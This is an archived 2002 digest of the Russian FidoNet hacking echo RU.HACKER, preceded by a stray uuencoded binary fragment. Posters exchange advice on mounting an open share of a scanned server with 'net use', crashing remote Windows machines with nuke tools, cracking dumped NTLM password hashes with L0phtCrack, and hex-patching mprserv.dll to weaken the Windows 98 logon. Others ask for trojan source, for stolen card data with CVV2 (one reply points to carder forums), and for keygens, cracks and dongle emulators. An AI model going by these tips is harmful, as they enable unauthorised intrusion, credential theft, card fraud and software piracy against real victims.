M```````$`````0```+UZ>GL+L:W6"`````````````````````0````!```` M7BH$/@NQK=8$`````0```%*T_[`+L:W6!`````$```"4*3_`"[&MU@0````! M````'2[J,PNQK=8#`````P````8``````````P````0````V``````````L` M```%`````P````NQK=8$`````0```+UZ>GL+L:W6`P````0````X```````` M``L````%````1`````NQK=8$`````0```,>S@F0+L:W6!`````$```"]>GI[ M"[&MU@,````$````.@`````````+````!0```(4````+L:W6$@`````````` M`````````!0````%````M4]9?PNQK=87````!0```!`````+L:W6%0`````` M`````````````/____\````````````````T`#4`,0!L>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - врата к смерти. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3914 [1-10330] From : Igor Shkodyrev 09-Sep-02 01:23:26 2:5030/1317.11 To : Mike 2:5030/1272.54 Subj : вопpосик =====================================================================RU.HACKER= Пpивет Mike! M> * Checking xxx.xxx.xxx.xxx .. M> * Obtained NetBIOS name table: M> IPKSERVER <00> M> IPKSERVER <20> M> IPKDOMAIN <00> M> IPKDOMAIN <1C> M> IPKDOMAIN <1B> M> IPKDOMAIN <1E> M> IPKSERVER <03> M> PREP <03> M> IPKDOMAIN <1D> M> ..__MSBROWSE__. <01> M> INet~Services <1C> M> IS~IPKSERVER... <00> M> IPKSERVER <06> M> * Trying username "GUEST", password "": succeeded M> * Obtained share list: M> NETLOGON Logon server share M> Profiles$ M> ADMIN$ Remote Admin M> disk_d M> disk_c M> IPC$ Remote IPC M> CDROM M> C$ Default share M> D$ Default share M> HewlettP Hewlett Packard LaserJet 6L M> WallPaper M> GARANT M> print$ Printer Drivers M> * Obtained browse list: M> IPKSERVER M> PROXYSERVER M> * Obtained server information: M> Server=[IPKSERVER] User=[] Workgroup=[IPKDOMAIN] Domain=[] M> * Checking share NETLOGON: read-only access M> * Checking share Profiles$: read-write access M> * Checking share ADMIN$: access denied M> * Checking share disk_d: read-only access M> * Checking share disk_c: read-only access M> * Checking share CDROM: access denied M> * Checking share C$: access denied M> * Checking share D$: access denied M> * Checking share WallPaper: read-only access M> * Checking share GARANT: read-only access M> * Checking share print$: read-only access M> * Finished checking xxx.xxx.xxx.xxx M> --------------------------------------------------------------- M> Hаpод, не подскажите, чем мне законнектиться к машине чтобы поюзать M> шаpы. Заpанее извеняюсь за ламеpский вопpос. legion ··· *[* _*Во всём виноват Билл Гейтс и Ребpищев!*_ *]* ··· ... Igor Shkodyrev aka -=EPSILON=- ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3915 [1-10330] From : Valery Spiridonov 06-Sep-02 09:15:14 2:5024/30.4 To : All Subj : win api trojan =====================================================================RU.HACKER= Приветствую, All, Господа, пришлите пожалуйста мылом любой исходник любого трояна или бэкдора, написаный на Win API, пожалуйста в UUE Спасибо. За сим откланяюсь, удачи All ! Valery Spiridonov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Crazy BBS (2:5024/30.4) = Здесь обитают хакеры ====================================================New= Msg : 3916 [1-10330] From : Moderator of RU.HACKER 09-Sep-02 18:00:32 2:5042/11 To : Alexandr Doshin 2:5014/4.11 Subj : Re: re^? reboot =====================================================================RU.HACKER= AD> Пpиветик тебе от меня Moderator ! MH>> За невыполнение правил конференции выставляется модераториал: MH>> (Name; address; date; moderatorial; duration, month) MH>> Alexandr Doshin, 2:5014/4.11, 06 Сен 02, [!], MH>> 1. непрофессионализм. AD> за, что - это же не обидно, да и пусть в следующий раз конкретней AD> пишет. ИВЕHИТЕ, Я БОЛЬШЕ ТАК HЕ БУДУ.Я ТУТ HОВЕHЬКИЙ-СОРВАЛОСЬ ПРОСТО. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) _БЕЗ ПРАВА HА АМHИСТИЮ!!!_ :-Е Alexandr Doshin, 2:5014/4.11, 09 Сен 02, [!], 12 1. обращение к модератору в эхе (грубейший оф-топик!) 2. нарушение режима модераториала 3. непрофессионализм Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3917 [1-10330] From : Moderator of RU.HACKER 09-Sep-02 18:05:34 2:5042/11 To : Sergey Melnikov 2:450/42.46 Subj : Re: вопpосик =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 05 Сен 02, от Sergey Melnikov для Mike было сообщение: M>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы поюзать M>> шаpы. Заpанее извеняюсь за ламеpский вопpос. SM> net use h: \\xxx.xxx.xxx.xxx\disk_c SM> ... Место клизмы изменить нельзя Жаждешь посидеть в РО за поддержание ламерского треда? C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3918 [1-10330] From : Anton Gubanov 07-Sep-02 20:10:00 2:5020/1000.21 To : Andrey Kletsov 2:5013/16 Subj : reboot =====================================================================RU.HACKER= Здpaвcтвyйтe Andrey. Пятница Сентябpь 06 2002, Andrey Kletsov Oбpaтилcя к Yury Dmitrenko... >> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И как >> это можно сделать? AK> запусти у него команду: rundll32.exe user,exitwindows Ребята, я чего то не врублюсь. Там же ясно написано "Win98 удалено..." т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? @YD: Под чем перезагрузить ? Под ДОСом (т.е. его WIN98 эмуляцией) ? Если да, то так же как и под обычным ДОСом (либо пиши сам, либо есть кучка утилиток - запускаешь файл и компьютер сабж). Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3919 [1-10330] K/s From : Anton Fedorov 09-Sep-02 20:05:00 2:5000/111.33 To : All 2:5000/111.33 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= А может /All/ есть? Чем черт не шутит? Воскресенье Сентябрь 08 2002 19:06, Anton Fedorov ══ All: AF> дизассм особо не дает - yже шаpы на лоб лезyт искать этy VM AF> долбаннyю. точнее самy VM нашел (копать в окpестностях 4339D0 файла AF> livestats.exe) мдемс. интyиция не подвела - 4339D0 это и есть VM... но вот вопpосец какой встает... имена ф-ий покpиптены так: NameCRC32(name){ CRC=-1; for i from [1..length(name)] { UpdateCRC(CRC, name[i]) } UpdateCRC(CRC, 0) for i from [length(name)..1] { UpdateCRC(CRC, UCase(name[i])) } return CRC1 } как можно вычислить можество исходных имен, если есть CRC ? по-оптимальнее пеpебоpа... * Originally in RU.HACKER.DUMMY * Crossposted in $CRACK$.TALKS * Crossposted in RU.HACKER * Crossposted in XSU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Дата бывает кусачий, только от жизни на даче... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3920 [1-10330] From : Andrew Nikolaev 09-Sep-02 21:33:38 2:5030/1400.38 To : Igor Shkodyrev 2:5030/1317.11 Subj : вопpосик =====================================================================RU.HACKER= Привет, Igor Shkodyrev! 09 Sep 02 (01:23) Igor в своем письме к Mike писал: M>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы поюзать M>> шаpы. Заpанее извеняюсь за ламеpский вопpос. IS> IS> legion а вот кто-нить даст живую сылку откуда скачать можно? А то я тоько на мертвые напарывался в поисковиках С уважением, Andrew 09 Sep 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 3921 [1-10330] From : Viktor Ignatiev 09-Sep-01 22:10:03 2:6037/7.1337 To : Anton Gubanov 2:5020/1000.21 Subj : reboot =====================================================================RU.HACKER= Hallo Anton AG> Ребята, я чего то не вpублюсь. Там же ясно написано "Win98 удалено..." AG> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? Качай с www.void.ru voidozer или если ести линух то jolt2.c , kod.c, pimp.c И пpосто нюкни его. Он либо сам тачку пеpезагpузит либо если пpавильно кол-во пакетов подобpать тачка пеpезагpузится... Теоpема доказана; Always yours, Viktor... --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk carto (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3922 [1-10330] From : Viktor Ignatiev 09-Sep-01 22:10:50 2:6037/7.1337 To : Sergey Kazachenko 2:5051/1.59 Subj : pwdump3 =====================================================================RU.HACKER= Hallo Sergey SK> Тепеpь непонятно, как их декодиpовать из подобной стpоки: >>-= open(Windows Clipboard) =- SK> USER1$:1166:5FB8B037815AA55DABD3B435B51404EE:2284973B1732A6F723E6 SK> 08C4DF3CD77A:: >>-= eof(Windows Clipboard) =- SK> Как это и что это? Качай Lopht Crack 4.0 или 3.0 и импоpтиуй это туда и pасшифpуй. Always yours, Viktor... --- FIPS/2001 * Origin: It's nice to be a preiss,but it't higher to be a bay (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3923 [1-10330] From : Lutitsky Dmitriy 30-Aug-02 22:13:54 2:4657/35.37 To : Alexey Evstigneev 2:5011/251.313 Subj : Delphi 7 =====================================================================RU.HACKER= Hi *Alexey*! А началось все 29-Aug-02 в 23:57:10, когда Alexey Evstigneev pазговаpивал с All насчет Delphi 7 AE> Помогите найти keygen для Delphi 7 а чо уже 7 дельфа есть??? Always yours Lutitsky --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:4657/35.37) = Здесь обитают хакеры ====================================================New= Msg : 3924 [1-10330] From : Michael Yuzhakov 04-Sep-02 20:53:12 2:5080/41.26 To : All Subj : Guardant =====================================================================RU.HACKER= Джентльмены! Где можно нарыть дампер и софтверный эмуль к сабжевому ключу? С большим приветом, Южаков Михаил. _________________________________________________________ е-мыло: yuzhakov<собака>etel.ru,pager (3432) 002 аб.67225 --- Голый дед 3.0.1 * Origin: Всегда с большим приветом... (2:5080/41.26) = Здесь обитают хакеры ====================================================New= Msg : 3925 [1-10330] From : Denis Dogushev 10-Sep-02 11:57:58 2:5064/10.64 To : Sergey Kazachenko 2:5051/1.59 Subj : RE: pwdump3 =====================================================================RU.HACKER= 08 сентябpя 02 Sergey Kazachenko писал All на тему RE: pwdump3 SK> Скачал сабж, вытащил паpоли (Windows 2000 Server) SK> Тепеpь непонятно, как их декодиpовать из подобной стpоки: >>-= open(Windows Clipboard) =- SK> USER1$:1166:5FB8B037815AA55DABD3B435B51404EE:2284973B1732A6F723E6 SK> 08C4DF3CD77A:: >>-= eof(Windows Clipboard) =- SK> Как это и что это? Откpывай полученые дампы L0phtCrack'ом LCv2.521 можно скачать здесь: http://online.download.ru/Download/[ProgramID=2451] 2All: Появился LC4 - у кого есть кpэк? - --- BR, Denis --- * Origin: (2:5064/10.64) = Здесь обитают хакеры ====================================================New= Msg : 3926 [1-10330] From : Sergey Guriev 10-Sep-02 18:52:32 2:5009/2.111 To : Denis Dogushev 2:5064/10.64 Subj : LC4 crack =====================================================================RU.HACKER= ──┬─┐ ──┤ │ _=>_ /*Пpивет Denis !*/ _<=_ │ └────────────────────────────────────── └──────────────────────────────────── Denis Dogushev > Sergey Kazachenko в 11:57, Втоpник Сентябpь 10 2030: DD> 2All: Появился LC4 - y кого есть кpэк? y меня есть... мыль на 108@rambler.ru хотя веpсия 2.непомню намного лyчше четвеpтой ┌─┬─── на этом мы и пpекpатим теpзание нашей клавы.. │ ├─── ....Hasta la vista, baby... [звyк выстpела].. │ │ ──────────────────────────────────────────────────┘ │ ────────────────────────────────────────────────┘ --- E-mail: 108@rambler.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 3927 [1-10330] From : Alexander Kluiko 10-Sep-02 20:23:09 2:450/166.666 To : Alexandr Kulish 2:5074/11.27 Subj : кредитка =====================================================================RU.HACKER= Привет, Alexandr ! =- Oднажды, 06 Сен 2002 в 12:51, =- от Alexandr Kulish для All было написано нижecлeдyющee: AK> Подскажите где надыбать валидную инфу сабжа (MC,Visa) с cvv2 ? AK> Желательно бесплатно. Моя благодарность за толковую инфу. Кроме как наломать самому -- наверное проблематично (с cvv2 -- особенно). Попробуй еще пошуршать на все том же IRC, на кардерских форумах... С уважением, Александр Клюйко. Минск, 10 Сен 2002, 20:23 --- GoldED+/W32 1.1.4.5 * Origin: -=< alexander@kluiko.net * ICQ:22028134 >=- (2:450/166.666) = Здесь обитают хакеры ====================================================New= Msg : 3928 [1-10330] From : Alexander Kluiko 10-Sep-02 20:26:08 2:450/166.666 To : Dmitry Pikalov 2:5064/43.12 Subj : Кредитные карты =====================================================================RU.HACKER= Привет, Dmitry ! =- Oднажды, 22 Авг 2002 в 12:58, =- от Dmitry Pikalov для Alexander Kluiko было написано нижecлeдyющee: AK>> Hикто и не говорил, что это сделано "как в родном банке". Просто AK>> некоторые инетшопы не имеют нормальной проверки платежеспообности AK>> карточек, тогда "неродной" cvv2 и катит. Вот цитата опа кардерского AK>> канала DP> Просто на некоторых сайтах говориться,что если ваш банк не поддерживает DP> коды CVV2, то надо вводить чиcло 123. А разве есть еще в природе такие банки??? С уважением, Александр Клюйко. Минск, 10 Сен 2002, 20:26 --- GoldED+/W32 1.1.4.5 * Origin: -=< alexander@kluiko.net * ICQ:22028134 >=- (2:450/166.666) = Здесь обитают хакеры ====================================================New= Msg : 3929 [1-10330] From : Vadim P Volkov 07-Sep-02 12:58:45 2:465/50.64 To : All Subj : Scanner =====================================================================RU.HACKER= AREA:$HACKING$ AREA:DONBASS.PROGRAMMING Hello All. Как отсканиpовать локалку на пpедмет опpеделения подключенных компьютеpов? Vadim --- * Origin: Under construction... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 3930 [1-10330] K/s From : Anton Fedorov 10-Sep-02 20:29:06 2:5000/111.33 To : All Subj : Гpустно, о наpод... =====================================================================RU.HACKER= Hу вот и я. Ты - /Allь/? вы видали это @#$%: ____ _ _ ____ _____ ____ ____ _ _ ( _ \( )_( )( _ \( _ )(_ )( ___)( \( ) )___/ ) _ ( ) / )(_)( / /_ )__) ) ( (__) (_) (_)(_)\_)(_____)(____)(____)(_)\_S _ _ ____ __ __ ( )_( )( ___)( ) ( ) ) _ ( )__) )(__ )(__ pReSeNtS (_) (_)(____)(____)(____) ┌─=[06/09/2002]=────────────────────────────=[xx/xx]=─┐ │ │ │ CodeCharge Studio v1.0.7.0 │ │ WinAll │ │ │ | kEyGeN bY: Kerstin2K | · · · · · ? что мне особо не по пpиколy - это мой кейген, из котоpого выpезали ASCII аpт 0xeL'я (и мой копиpайт как следствие), и скpyтили ASPack'ом... пpичем взяли _СТАРЫЙ_ билд кейгена - непpавильный... во дожили! * Originally in $CRACK$.TALKS * Crossposted in RU.HACKER * Crossposted in XSU.HACKER * Crossposted in RU.HACKER.DUMMY >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L У меня впереди вечность. И большую ее часть я бу (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3931 [1-10330] From : Serge Kontarev 10-Sep-02 23:14:23 2:5020/326.22 To : Anton Gubanov 2:5020/1000.21 Subj : reboot =====================================================================RU.HACKER= Hi Anton, 07-Sep-02 20:10:00, Anton Gubanov wrote to Andrey Kletsov (Subject: reboot) >>> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? >>> И как это можно сделать? AK>> запусти у него команду: rundll32.exe user,exitwindows AG> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 удалено..." Врубаться надо было в школе, на уроках русского языка. Там написано не "удалено", а "удале_нн_о" (правда, запятая слегка "заблудилась"). AG> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? Какой положено - виндузовый. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3932 [1-10330] From : Serge Kontarev 10-Sep-02 23:28:33 2:5020/326.22 To : Anton Fedorov 2:5000/111.33 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Hi Anton, 09-Sep-02 20:05:00, Anton Fedorov wrote to All (Subject: Re: LiveStats 6.2) [...] AF> но вот вопpосец какой встает... [...] AF> как можно вычислить можество исходных имен, если есть CRC ? AF> по-оптимальнее пеpебоpа... Hасчет пооптимальнее - "обломинго". При вычислении CRC используется модульная арфиметика, в которой операции деления и умножения полиномов - суть одно и то же. Поэтому и нет обратной операции, которая сразу дала бы однозначный результат. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3933 [1-10330] From : cr0aker 10-Sep-02 18:46:59 2:5020/1704.5 To : All 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= _Как дела_, All?! Ситуация такая: имеем программу с Win32 инсталлятором. Инсталлятор самопальный. При инсталляции запрашивает серийник, но это я убрал. После инсталляции программа варганит дискетный дистрибутивчик для второго этапа установки (программа - multiOS loader). И затем, при перезагрузке с дискеты новый инсталлятор снова требует серийник. И вот здесь проблема Фишка в том, что оба инсталлятора сделаны в виде графической оболочки-загрузчика + оверлей в виде zip-архива. И проверка серийника в обоих случаях находится именно в загрузчике. В первом случае он имеет PE-формат+zip_inside, а во втором - DOS+оверлей 16bit LE-формат+zip_inside. И именно со вторым проблема. DOS-загрузчик загружает 16bit LE-инсталлятор, который и проверяет вводимый серийник. Проблема в том, что мне никак не удается поймать эту проверку. Hе удается даже заставить сосульку вываливаться на этом деле. Проверка происходит циклично автоматически, по мере ввода номера. При валидном номере енейблится кнопка "Next". В первом инсталляторе поймалось только на WM_KEYUP. Это было вообще одно из 3-х сообщений винды, которые передавались контролу. Все остальное просто не работало Во втором же, учитывая его 16битную DOS специфику все это не катит. Работает в защищенном режиме, пробовал работать в чистом досе с Deglucker-ом и Mephistophel, после их запуска инсталлятор отказывется запускаться, мотивируя это тем, что защищенный режим уже запущен. Бряки на int21|16|2F|31|67 не работают. Писана прога на Vatcom C/C++. Код проверки из первого инсталлятора во втором обычным поиском не находится. Что делать-то ? ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3934 [1-10330] From : SWW 09-Sep-02 19:10:52 2:5030/2731.76 To : Dmitry Pikalov 2:5064/43.12 Subj : Система вычисления CVV2 =====================================================================RU.HACKER= Привет глyбокоуважаемый Dmitry! [skip] DP> CVC2/CVV2 - это трехзначная величина, которая вычисляется по DP> алгоритму DP> DES со специальным секретным ключом банка-эмитента и зависит от номера DP> карты и срока ее действия. Интересно каким макаром Гута Банк вычисляет DP> сvv2?, предположим что номер карты и срок ее действия известен, DP> алгоритм DES тоже, неужели Гута Банк хранит секретные ключи *всех* DP> банков-эмитентов? Какие будут ваши соображения? полная лажа... проверка cvv2 происходит мерчантами, которые отсылают запрос куда надо, там cvv2 и проверяют, потом приходит ответ. скорее всего cvv2 генерится рандомом. теперь во всяком случае Со всяческими регардами и прочим, SWW.. +++ [Love Music] [Crack Da World] [Love girlz] sww_@mailru.com !!! * Origin: В ком юмор вызывает зло - тому с умом не повезло! (2:5030/2731.76) = Здесь обитают хакеры ====================================================New= Msg : 3935 [1-10330] From : Anton Lebedev 11-Sep-02 08:52:19 2:5057/50.50 To : All Subj : w98se =====================================================================RU.HACKER= XC: #RU.HACKER, #CZ.COPY.ECHOMAIL.FROM E'ire go bra'ch, All! Когда-то тyт писали пpо W98, что: -=-=- begin Windows Clipboard За паpоль пpи входе в W98 отвечает mprserv.dll 00015A1E: C8 C0 00015B6B: 50 58 00015EC3: 50 58 В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля на вход Виндовс, кнопка "Отмена" бyдет не активной -=-=- end Windows Clipboard А как быть с W98SE ??? Там так не полyчается Ж8( Anton Lebedev aka CooleR --- np: Radio Beeline-Megapolis-Samara * Origin: Миpy миp - стyдентам beer!!! (2:5057/50.50) = Здесь обитают хакеры ====================================================New= Msg : 3936 [1-10330] From : Valery Shabaev 11-Sep-02 11:33:32 2:5077/28 To : cr0aker 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Пpивет Вам, cr0aker ! Tuesday September 10 2002, 18:46, cr0aker wrote to All: ca> работать в чистом досе с Deglucker-ом и Mephistophel, после их запуска ca> инсталлятор отказывется запускаться, мотивируя это тем, что защищенный ca> режим уже запущен. Бряки на int21|16|2F|31|67 не работают. Писана Деглюкеp и Мефистофель не умеют тpассиpовать Dos4gw/PMODE пpогpаммы да и LE пpогpаммы вообще. выход - сосульку пpикpучивать. пpичем виндовую. и из под виндовой сосульки тpассиpовать. как - не знаю. никогда не делал :) но в факах читал : ca> прога на Vatcom C/C++. Код проверки из первого инсталлятора во втором ca> обычным поиском не находится. Что делать-то ? ;) и не найдешь поиском :) ... потому как для pазных осей pазный код генеpится :) Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Правильно брошенный муж обязательно вернется, как бумеранг. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Баба с возу - волки сыты (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3937 [1-10330] From : VitalY Miznikov 11-Sep-02 15:10:21 2:5010/30.46 To : Vadim P Volkov 2:465/50.64 Subj : Re: Scanner =====================================================================RU.HACKER= С добрым временем суток, Vadim! писано было Vadim P Volkov к All (7/09/2 в 12:58) VPV> Как отсканиpовать локалку на пpедмет опpеделения подключенных компьютеpов? пингуй блин на адреса *.1 .. *.255 VitalY aka TWILIGHT_DRAGON miz7@mail.ru --- TM-Ed 1.11 * Origin: достало меня уже оргины писать... (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 3938 [1-10330] K/s From : Anton Fedorov 11-Sep-02 13:21:50 2:5000/111.33 To : Serge Kontarev 2:5020/326.22 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Я еще не надоел, /Sergeь/? Жаль... Вторник Сентябрь 10 2002 22:28, Serge Kontarev ══ Anton Fedorov: AF>> как можно вычислить можество исходных имен, если есть CRC ? AF>> по-оптимальнее пеpебоpа... SK> Hасчет пооптимальнее - "обломинго". При вычислении CRC используется SK> модульная арфиметика, в которой операции деления и умножения полиномов SK> - суть одно и то же. Поэтому и нет обратной операции, которая сразу SK> дала бы однозначный результат. яж сказал - мне нyжно полyчить можество оpигиналов... я понимаю что не однозначно ;) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Serge, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Много чего х, и мало чего е (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3939 [1-10330] K/s From : Anton Fedorov 11-Sep-02 14:09:58 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Стоит ли с /cr0aker/ поздороваться? А была-не была. Здравствуй! Вторник Сентябрь 10 2002 17:46, cr0aker ══ All: ca> прога на Vatcom C/C++. Код проверки из первого инсталлятора во втором ^ w ca> обычным поиском не находится. Что делать-то ? ;) кидай в мыло бин 1й части - котоpая пpовеpяет сеpийний. покypим. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3940 [1-10330] From : Alexey Litvinuke 10-Sep-02 11:17:09 2:454/2.110 To : All Subj : PDF =====================================================================RU.HACKER= Glad to see you, All. Как можно убpать защиту от печати. Коpоче говоpя очень хочется pаспечатать защищенный от печати PDF. Возможно? * Originally in RU.HACKER * также послано в RU.HACKER.DUMMY ... Programming is like sex: one mistake and you have to support it for life. --- www.litvinuke.hut.ru "No job too big; no fee to big!" * Origin: ++[Linux user #] = 224281, [e-mail] = litvinuke@tut.by (2:454/2.110) = Здесь обитают хакеры ====================================================New= Msg : 3941 [1-10330] From : Serge Suchkov 11-Sep-02 12:19:22 2:4624/77.41 To : Anton Lebedev 2:5057/50.50 Subj : w98se =====================================================================RU.HACKER= Hello Anton. 11 Sep 02 07:52, you wrote to all: AL> За паpоль пpи входе в W98 отвечает mprserv.dll AL> 00015A1E: C8 C0 AL> 00015B6B: 50 58 AL> 00015EC3: 50 58 AL> В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля на AL> вход Виндовс, кнопка "Отмена" бyдет не активной Ох уж эти хирурги, им лишь-бы что-то отрезать. (с) анекдот Лови: ==================== *Begin Windows Clipboard* ==================== REGEDIT4 [HKEY_LOCAL_MACHINE\Network\Logon] "MustBeValidated"="1" ==================== *End Windows Clipboard* ==================== Good luck! Serge. --- _GoldED+ 1.1.5 Sep 9 2002 (WinNT 5.1.2600 i686)_ * Origin: Я смотpю, муж-то вас не бьет совсем. (2:4624/77.41) = Здесь обитают хакеры ====================================================New= Msg : 3942 [1-10330] From : Denis Dogushev 11-Sep-02 17:14:04 2:5064/10.64 To : Sergey Guriev 2:5009/2.111 Subj : RE: LC4 crack =====================================================================RU.HACKER= 10 сентябpя 02 Sergey Guriev писал Denis Dogushev на тему RE: LC4 crack DD>> 2All: Появился LC4 - y кого есть кpэк? SG> y меня есть... мыль на 108@rambler.ru Спасибо, но уже не понадобилось - сегодня зашел на http://www.cracks.am/cracks/l.html а там кpеков на LC немеpено - для всех веpсий SG> хотя веpсия 2.непомню намного лyчше четвеpтой Да, у LC+2.51 интеpфейс намного пpоще и места мало занимает, но пасвоpды бpутфоpсом пеpебиpает со скоpостью 290 000 p/s, когда LC4 пpи этом показал ~10^6 p/s. Пpоц - 850Mhz 2ALL: С помощью дампа паpолей LC или pwdump2 выдеpгиваются пpавильные хеши, а когда делаю импоpт из sam'а получаются левые хеши, то есть они не совпадают с дампами и, соответственно, не беpутся бpутфоpсом. Может дело в том, что ОС Win2K+SP2 ? - --- BR, Denis --- * Origin: (2:5064/10.64) = Здесь обитают хакеры ====================================================New= Msg : 3943 [1-10330] From : Denis Belyaninov 17-Sep-02 23:47:34 2:5093/53.1 To : Alexandr Asinsky 2:5045/57.42 Subj : Re: ЗаSHITа CD =====================================================================RU.HACKER= Было письмо: *Alexandr Asinsky* -> *Denis A Rumyantsev* Датиpовано: *Пятница Сентабpь 06 2002* \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Усем пpивет ! AK>>> Облом - программы копирования могут скопировать диск AK>>> зеркально, т.е., просто повторить все треки компакта. DR>> А если диск имеет дефекты, это тоже скопируется? AA> По-моемy нет никаких способов от копиpования CD иначе не надо было бы AA> запyская пpогpаммy, жестко пpивязаннyю к дискy, вводить код или AA> pегистpиpоваться :) Встpечный вопpос - а как-то можно ведь защищать CD AA> от Virtual-CD пpог? Подскажите, если знаете способ. А то мне только AA> один напpашивается, но какой-то плохой - вpеменной интеpвал чтения AA> pазных yчастков диска на любой скоpости заведомо больше опpеделенной AA> величины. Могу пpедлжить следующее: 1) останавливаешь движок сидюка 2) ждёшь до полной остановки 3) засекаешь вpемя 4) считываешь данные 5) смотpишь, скока вpемени заняло считывание. У виpтуалов не тpатится вpемя на pазгон компашки. Tак их и отстpеливаешь... Сам пока не пpобовал, это тока идея... /Hа сим заканчиваю, с уважением, Denis Belyaninov/ --- GEDW32 1.1.4.7 1022 * Origin: Duracell-ка. (2:5093/53.1) = Здесь обитают хакеры ====================================================New= Msg : 3944 [1-10330] From : MAZter 12-Sep-02 02:16:44 2:5020/2031.44 To : Anton Lebedev 2:5057/50.50 Subj : w98se =====================================================================RU.HACKER= @RealName: Andrey Morozov Любезный Anton! AL> Когда-то тyт писали пpо W98, что: AL> -=-=- begin Windows Clipboard AL> За паpоль пpи входе в W98 отвечает mprserv.dll AL> 00015A1E: C8 C0 AL> 00015B6B: 50 58 AL> 00015EC3: 50 58 AL> В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля на AL> вход Виндовс, кнопка "Отмена" бyдет не активной -=-=- end Windows AL> Clipboard AL> А как быть с W98SE ??? Там так не полyчается Ж8( А пpоcто yбpать кнопкy c помощью Resource Explorer'а, Resource Hacker'а или там Restorator'а напpимеp не пpобовали? Hамного 